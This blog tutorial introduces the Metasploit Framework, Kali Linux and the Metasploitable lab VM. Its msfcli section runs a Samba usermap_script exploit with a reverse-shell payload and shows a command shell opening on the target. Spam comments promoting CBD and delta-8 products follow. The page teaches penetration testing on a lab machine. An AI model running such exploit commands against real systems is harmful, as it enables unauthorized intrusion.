Start with metasploit framework

How to start with metasploit framework |penetration testing

What is Metasploit?

The Metasploit Framework (MSF) is far more than just a collection of exploits–it is also a solid foundation that you can build upon and easily customize to meet your needs. This allows you to concentrate on your unique target environment and not have to reinvent the wheel.

Metasploit is one of the single most useful security auditing tools freely available to security professionals today, all the way to network information gathering tools and web vulnerability plugins, the Metasploit Framework provides a truly impressive work environment. Also, when speaking about Metasploit we can’t forget to speak about Kali Linux.  

What is Kali Linux?

Kali Linux is a Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing. It contains several hundred tools that are geared towards various information security tasks, such as Penetration Testing, Security research, Computer Forensics and Reverse Engineering.

Kali Linux is developed, funded and maintained by Offensive Security, a leading information security training company.

you may like also how to install kali Linux properly

what is Metasploitable?

Metasploitable is an intentionally vulnerable Linux virtual machine that can be used to conduct security training, test security tools, and practice common penetration testing techniques.

The VM will run on any recent VMware products and other visualization technologies such as VirtualBox.

You can download the image file of Metasploitable 2 from SourceForge. Once you have downloaded the Metasploitable VM, extract the zip file, open up the .vmx file using your VMware product of choice, and power it on. Then after a brief time, the system will be booted and ready for action. The default login and password is msfadmin:msfadmin.

Metasploit Architecture

Metasploit is written in Ruby and has been in development for many years one can more easily understand the Metasploit architecture by taking a look under its hood.

In learning how to use Metasploit, take some time to make yourself familiar with its filesystem and libraries. In Kali Linux, Metasploit is provided in the Metasploit-framework package and is installed in the /usr/share/metasploit-framework directory, the top-level of which is shown below.


In the Metasploit Framework, all modules are Ruby classes.

  • Modules inherit from the type-specific class
  • The type-specific class inherits from the Msf::Module class
  • There is a shared common API between modules

Payloads are slightly different.

  • Payloads are created at runtime from various components
  • Glue together stagers with stages


There are many different interfaces to use with this hacking tool, each with its own strengths and weaknesses. There is no one perfect interface to use with the Metasploit console, although the MSFConsole is the only supported way to access most Metasploit commands.

It is still beneficial, however, to be comfortable with all Metasploit interfaces.

you may want to install kali NetHunter on your android

What is the MSFcli?

The msfcli provides a powerful command line interface to the framework. This allows you to easily add Metasploit exploits into any scripts you may create.

Command Line Interface Commands

For msfcli help: type msfcli –h.

help command msf

Note: when using msfcli, variables are assigned using the “equal to” operator = and that all options are case-sensitive.

root@kali:~# msfcli exploit/multi/samba/usermap_script RHOST= PAYLOAD=cmd/unix/reverse LHOST= E
[*] Please wait while we load the module tree...
       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 936 exploits - 500 auxiliary - 151 post
+ -- --=[ 252 payloads - 28 encoders - 8 nops
       =[ svn r15767 updated today (2012.08.22)
PAYLOAD > cmd/unix/reverse
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo cSKqD83oiquo0xMr;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "cSKqD83oiquo0xMr\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened ( -> at 2012-06-14 09:58:19 -0400
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

If you aren’t entirely sure about what options belong to a particular module, you can append the letter O to the end of the string at whichever point you are stuck.

root@kali:~# msfcli exploit/multi/samba/usermap_script O
[*] Initializing modules...
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port

To display available payloads for the current module, append the letter P to the msfcli command line string.

root@kali:~# msfcli exploit/multi/samba/usermap_script P
[*]Initializing modules...

Benefits of the MSFcli Interface

  • Supports the launching of exploits and auxiliary modules
  • Useful for specific tasks
  • Good for learning
  • Convenient to use when testing or developing a new exploit
  • Good tool for one-off exploitation
  • Excellent if you know exactly which exploit and options you need
  • Wonderful for use in scripts and basic automation

The only real drawback of msfcli is that it is not supported quite as well as msfconsole and it can only handle one shell at a time, making it rather impractical for client-side attacks.

It also doesn’t support any of the advanced automation features of msfconsole.

Closing words

congratulation you have reach the end hope now you know what metasploit is. if you hare having a question don’t keep for your self. share with us. for more information go offensive security official page

36 thoughts on “How to start with metasploit framework |penetration testing”

  1. Undeniably believe that which you stated. Your favourite
    justification appeared to be on the net the easiest thing to
    have in mind of. I say to you, I definitely get annoyed
    even as other folks consider concerns that they just do not recognise
    about. You controlled to hit the nail upon the top and
    defined out the entire thing with no need side effect , folks could take a signal.
    Will likely be again to get more. Thanks

  2. You actually make it seem so easy with your presentation but I find this matter to be really something that I think
    I would never understand. It seems too complex and extremely broad for me.
    I am looking forward for your next post, I will try to get
    the hang of it!

  3. Thanks a lot for sharing this with all folks you really understand what you
    are speaking approximately! Bookmarked. Please also seek advice from my site =).
    We can have a link change agreement among us

  4. Usually I don’t learn article on blogs, but I would
    like to say that this write-up very pressured me
    to try and do so! Your writing taste has been surprised
    me. Thank you, very nice article.

  5. Thank you, I have just been searching for info approximately this topic for a long
    time and yours is the best I’ve discovered so far. But,
    what in regards to the bottom line? Are you certain in regards to the supply?

  6. Excellent beat ! I would like to apprentice whilst you amend your web site, how can i subscribe for a weblog website?
    The account helped me a acceptable deal. I had been tiny bit
    acquainted of this your broadcast offered vivid transparent concept

    Look at my web blog … CBD gummies for sale

  7. My developer is trying to persuade me to move to .net from PHP.
    I have always disliked the idea because of the expenses.
    But he’s tryiong none the less. I’ve been using WordPress on various websites for about a year and am
    nervous about switching to another platform. I have heard good things about
    Is there a way I can import all my wordpress
    posts into it? Any kind of help would be greatly appreciated!

    my blog post :: delta 8 thc products

  8. Simply wish to say your article is as astounding. The clarity
    to your post is just cool and that i could think you’re a professional on this subject.
    Fine together with your permission let me to snatch your feed
    to keep updated with coming near near post.
    Thanks a million and please keep up the enjoyable work.

    Feel free to visit my blog post where to buy CBD

  9. Great post. I was checking continuously this weblog and I’m impressed!
    Very useful information specifically the ultimate section :
    ) I handle such info much. I was looking for this particular
    info for a long time. Thank you and good luck.

    Check out my web site CBD gummies for sale

  10. Thank you for some other fantastic article. Where else may just anyone get that
    type of information in such an ideal manner of writing?
    I’ve a presentation subsequent week, and I’m at
    the look for such information.

    my web page – best CBD

  11. After checking out a few of the blog articles on your blog, I really
    like your way of writing a blog. I saved
    as a favorite it to my bookmark website list and will be checking
    back soon. Please visit my website as well and tell me what you think.

    Also visit my blog post: delta 8 carts

  12. Hello! I know this is kinda off topic however I’d figured
    I’d ask. Would you be interested in exchanging links or maybe guest writing a blog post or vice-versa?
    My site discusses a lot of the same subjects as yours and
    I feel we could greatly benefit from each other.
    If you are interested feel free to send me an email.
    I look forward to hearing from you! Fantastic blog by the way!

    delta 8 area 52 – delta 8 area 52

    delta 8 area 52 – delta 8 THC for sale area 52

    Area 52 delta 8 carts – delta 8 THC area 52

    delta 8 area 52 – delta 8 area 52

    delta 8 THC area 52 – Area 52 Delta 8 THC

  13. I’m truly enjoying the design and layout of your
    website. It’s a very easy on the eyes which makes it much more
    enjoyable for me to come here and visit more often. Did you
    hire out a designer to create your theme? Superb work!

    delta 8 carts Area 52 – delta 8 carts Area 52

    delta 8 carts Area 52 – delta 8 THC for sale area 52

    area 52 delta 8 THC products – delta 8 THC area 52

    area 52 delta 8 THC products – buy delta 8 THC area 52

    delta 8 THC area 52 – Area 52 Delta 8 THC

  14. Fascinating blog! Is your theme custom made or did you download
    it from somewhere? A design like yours with a few simple tweeks would really make
    my blog shine. Please let me know where you got your
    theme. Bless you

    area 52 delta 8 THC products – area 52 delta 8 THC products

    area 52 delta 8 THC products – delta 8 THC area 52

    Area 52 delta 8 carts – delta 8 carts Area 52

    area 52 delta 8 THC products – delta 8 THC area 52

    Area 52 Delta 8 THC – area 52 delta 8 THC products

Leave a Reply

Your email address will not be published. Required fields are marked *